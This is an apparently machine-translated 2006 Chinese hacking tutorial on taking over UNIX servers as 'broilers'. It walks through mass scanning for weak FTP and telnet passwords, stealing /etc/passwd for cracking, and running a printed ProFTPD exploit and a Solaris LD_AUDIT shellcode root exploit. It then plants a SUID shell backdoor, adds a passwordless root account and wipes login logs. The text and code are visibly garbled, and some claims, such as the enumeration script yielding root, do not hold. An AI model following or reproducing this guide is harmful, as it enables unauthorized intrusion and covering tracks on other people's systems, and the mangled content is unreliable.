Have your first*NIX broiler-vulnerability warning-the black bar safety net

ID MYHACK58:6220068636
Type myhack58
Reporter 佚名
Modified 2006-04-07T00:00:00


The copyright of all, reproduced Please note the name of the evanescent water QQ: 2 7 8 7 4 7 4 6 7 "Dear audience friends!~ I may want to die you Ah!~" Recently has been studying theNUXas the system. Don't have much time to fuss, immediately 5 months and want to start to research, come by this afternoon all right, then remembered the article written pastime. Huh. Currently online invasion of articles is really a dime a dozen. Most of them are windows-based invasion, the simple website hanging horse can already make you have a lot of chickens, even if you are a little technology nor the big rookie. Huh. Used to use the windows under the c:\windows\system32 think getting a little boring? The test call is very distant#or even the$sign is not more tempting?" But I won't, so you can invasion theNIX system?" Huh. If you're such a great rookie, then the static under heart to look at this article!~ This article without any technical at all, only for some of the also did not get theUNX broilers friends^-^this document to the hacker animation bar, and a mixed client base of friends. Well ass Put a little bit more. In lay down to go someone will take brick shoot me. The following is a step-by-step to talk to me to find that destiny belongs to you that the first UNIX broiler!~ Since the fool was the invasion of the scanner of course is, ultimately, what the flow of light, X-SCAN it. SPUERCSAN saying there is a big pile Oh, this I give you recommend the Red UNITA HScan is. Speed and accuracy are very good, and the ratio of the X-SCAN scan when accounting for the memory is much smaller, although this. I still recommend everyone to put this tool in your broiler on, preferably a server, so it will not affect your other work. We open the graphical interface of the scanner hscangui. exe the interface is as follows<Figure 1>.

! well, what to scan? Don't worry, first determine the target. With QQWry looking for, don't say you don't know this is what Ah! Go to your QQ installation directory to look in, add the address query can be,<Figure 2>! , find a section IP addresses, your intuition will tell you that your broiler will be in there!) Looking good after the start scanning ports, this I recommend S. exe huh. Speed absolutely superb fast, huh. Career method is very simple for everyone to run once you know, fill in the IP after start scan, port scan 2 2 You can, remember to save Oh.& lt;Figure 3>.! here we can scan the range larger. The scan finished after 到 你 S.EXE 的 目录 下 找 result.txt the. Remove the excess part, leaving only IP. Note that there are some spaces also to be removed. Well, taking you to modify the IP text COPY to the HSCAN with the directory on it, everything is in place, following the HScan appearances. Open the lower left corner of the Menu Menu. Point Modules. Hook selected ftp and telnet if the Password option, OK, save, and then continue to point to the Menu Menu. Point Paremeter options. In the Hostlist before the check mark here. OPEN to find your ip. TXT put"ping host before scan"on the front of the hook removed. OK save. Continue to open Menu Menu. The point of Start you can begin scanning. Oh it is so simple^-^in. Well <Figure 4>.! , etc. Wait for it to scan finished. It will automatically generate a web page report in the Report directory.& lt;Figure 5>!

Find useful information, in General ftp/ftp@ftp.net 这种 是 没什么 用 的 other non-anonymous users are useful, [FTP-SCAN] banner: 2 2 0 vsFTPd and ProFTPD, and wu-ftp these are theUNX server using the FTP version For example, I This 1 1 1. 1 1 1. 1 1 1 web/1 2 3. Good. So much to do and finally find the target, Googly? UNX broiler the next step was born, huh. Excited!~ Since your machine is windows System. So the broiler of SSH is required, we use a tool to connect. Here is recommended the use abroad of the PUTTY in. Open PUTTY. EXE added a good target, selected SSH you can login. The first connection of the time there will be a prompt dialogue to the basket. Selected"Yes"and enter password can login;< Figure 6>! here you can see my this is Sun Microsystems Inc. SunOS 5.10 Generic May 2 0 0 2 Version, everyone can use the uname-a command to view the version, remember in the SUNOS 5. 6-5. Version 8 has a very good overflow vulnerability is the telnet overflow vulnerability. Everyone enter/bin/bash enter you can see the$symbol, this is a normal user, and ROOT user is a#, It is also our goal today!~ We were the first to put his passwd password catch down the right, with streams of light running when we go looking for EXP, so efficiency was high. Oh, with cat /etc/passwd you can<Figure 7>.! and copy to the local. With pass2dic. exe the the passwd of the user. And then with a stream of light to break the password. Where the need for a relatively strong password dictionary, this you can other articles, I will not say more. Huh. This password has been shadow too, so can't use john to run, only with a streamer. Well, no matter. Since this FTP version is ProFTPD Version 1.2.10, to the foreigners of the station also really found this version of overflow EXP, the following is the code =============================================================================== / Details Vulnerable Systems: * ProFTPD Version 1.2.10 and below */

include <sys/socket. h>

include <sys/types. h>

include <stdio. h>

include <arpa/inet. h>

include <sys/time. h>

define PORT 2 1

define PROBE 8

main (int argc, char **argv) { int sock,n,y; long dist,stat=0; struct sockaddr_in sin; char buf[1 0 2 4], buf2[1 0 2 4]; struct timeval tv, tv2; struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploit\n" "Coded by Leon / LSS Security\n" ">-------------------------------------<\n");

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0); sin. sin_family = AF_INET; sin. sin_port = htons (PORT); sin. sin_addr. server_address = inet_addr (argv[1]); bzero (sin. sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: "); n = read (sock,buf2, sizeof(buf2)); for (y=0;y<PROBE;y++) { gettimeofday (&tv,&tz); snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]); write (sock, buf, strlen(buf)); n = read (sock,buf2, sizeof(buf2)); gettimeofday (&tv2,&tz2); dist =tv2. tv_usec - tv. tv_usec; stat += dist; printf (" %d |",dist); } printf ("\nAvrg: %d\n",(stat/PROBE)); close (sock); }

=========================================================================== The first cd /tmp come to the/tmp directory Cat >1. c paste the above code. Then ctrl+c you can save. And then compile, the results found no GCC. Pour!~, the We use the whereis /b-gcc Or which gcc to find his gcc the location of the files gcc: /usr/local/bin/gcc Then compile gcc-o 1 1. c;ls-la 1 -rwxr-xr-x 1 oracle other 1 1 8 1 4 kui 6 old 1 6:0 6 1 Then./ 1. c,OK successful get the#, Now look atdaumsoft-search# id uid=0(root) gid=0(root) Here we have already got the ROOT permission. This is also one of EXPLORIT is for this system. Even with the Fed out of it, refers to the uncertainty brought you will be used to /* - SunOS 5.10 Generic i86pc i386 i86pc - SunOS 5.9 Generic_112233-1 2 sun4u

It does NOT work on:

SunOS 5.8 Generic_117350-0 2 sun4u sparc

Example on unpatched Solaris 1 0 (AMD64):

atari:venglin:~> cat dupa. c */

static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\69\x6e\x88\x44\x24\x07\x89\the XE3\x50\x53\x8d\x0c\x24\x8d\x54\ x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

int la_version() { void (f)(); f = (void)sh; f(); return 3; }

/* atari:venglin:~> gcc-fPIC-shared-o /tmp/dupa. so dupa. c atari:venglin:~> setenv LD_AUDIT /tmp/dupa. so atari:venglin:~> su


uid=0(root) gid=1 0(staff) */ Well, next is the left rear door. This on-line big cow cow door also introducing a lot of, I'll simply talk about it, huh mkdir /usr/eric/1 2 3 cp /bin/bash /usr/eric/123/.sh chown root:root /usr/eric/123/.sh chmod +s /usr/eric/123/.sh This is a SUID Backdoor. After using normal account login when enter/usr/eric/1 2 3/. sh you can get a ROOT. Or directly add an administrator go in. echo eric::::::::>>/etc/shadow

echo eric::0:0::/home/. network:/bin/bash>>/etc/passwd

passwd eric this is to modify the password^-^ In or is added to a ROOTKIT, or a Bindshell. Even it is not in the Feature Film big theory, huh. Everyone in the windows in the left 3 3 8 9 are you want to wipe the PP.. NIX recorded more powerful Oh, the user directly input: W you can view the last login information. The time and IP, etc., we are here, of course, also need to RUB the PP!~ Here it is with a wipe-1.00. The code coupling will not stick out. There are 10K Oh, you can go to google on looking. You can also direct me to ha!~ The same approach gcc-O3-DHAVE_LASTLOG_H-DHAVE_UTMPX-o wipe wipe. c ./ wipe u oracle ./ wipe w oracle ./ wipe l oracle Here oracle is the you go through account<Figure 7>! Good to here the basic work of reporting has become. Oh, the perks? Got it!~ ForNIX systems that is mainly to give the first account. So I detailed description of the front part of the rear of the main idea is to find the EXP to enhance the ROOT, rather monotonous. Huh. Good. You can see after reading this I have been very touched. Master see here may have been spit almost. Just shove off!~ Is there something in the black bar and mixed customer base looking for me!! QQ: 2 7 8 7 4 7 4 6 7 expect cattle presence!~

2006.4.6 1 8:2 9